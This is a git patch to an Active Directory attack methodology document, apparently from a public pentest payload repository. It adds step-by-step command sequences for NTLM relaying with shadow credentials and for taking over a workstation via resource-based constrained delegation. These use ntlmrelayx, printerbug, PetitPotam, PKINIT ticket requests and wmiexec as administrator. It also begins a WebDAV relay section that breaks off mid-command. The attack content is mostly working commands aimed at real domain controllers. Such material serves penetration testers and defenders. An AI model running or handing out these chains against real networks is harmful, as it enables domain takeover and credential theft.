From 1c8067a15054ff63d48d326269cd60d4e222db76 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 30 Oct 2021 21:04:23 +0200 Subject: [PATCH] Relaying with WebDav Trick + Shadow Credential --- .../Active Directory Attack.md | 55 +++++++++++++++++-- 1 file changed, 50 insertions(+), 5 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b16c3eb..24a322f 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -69,6 +69,7 @@ - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay) - [DNS Poisonning - Relay delegation with mitm6](#dns-poisonning---relay-delegation-with-mitm6) + - [Relaying with WebDav Trick](#relaying-with-webdav-trick) - [Active Directory Certificate Services](#active-directory-certificate-services) - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) @@ -1636,11 +1637,32 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa ``` **Scenario**: -- Trigger an NTLM authentication from `DC01` (PetitPotam) -- Relay it to `DC02` (ntlmrelayx) -- Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) -- Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` +- Scenario: Shadow Credential relaying + - Trigger an NTLM authentication from `DC01` (PetitPotam) + - Relay it to `DC02` (ntlmrelayx) + - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) + - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` +- Scenario: Workstation Takeover with RBCD + ```ps1 + # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 + + # Set up ntlmrelayx to relay authentication from target workstation to DC + proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 + + # Execute printer bug to trigger authentication from target workstation + proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file + + # Get a TGT using the newly acquired certificate via PKINIT + proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR + + # Get a TGS for the target account + proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v + + # Utilize the TGS for future activity + export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache + proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab + ``` ### Pass-the-Hash @@ -1994,6 +2016,27 @@ export KRB5CCNAME=administrator.ccache secretsdump.py -k -no-pass target.lab.local ``` +#### Relaying with WebDav Trick + +> Example of exploitation where you can coerce machine accounts to authenticate to a host annd combine it with Resource Based Constrained Delegation to gain elevated access. + +**Requirement**: +* WebClient service + +**Exploitation**: +* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf` +* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0 +* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support` +* Discover WebDAV using [GetWebDAVStatus](https://github.com/G0ldenGunSec/GetWebDAVStatus): `GetWebDAVStatus.exe 10.0.0.4` +* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/pentestlab 10.0.0.4` +* Use the created account to ask for a service ticket: + ```ps1 + .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l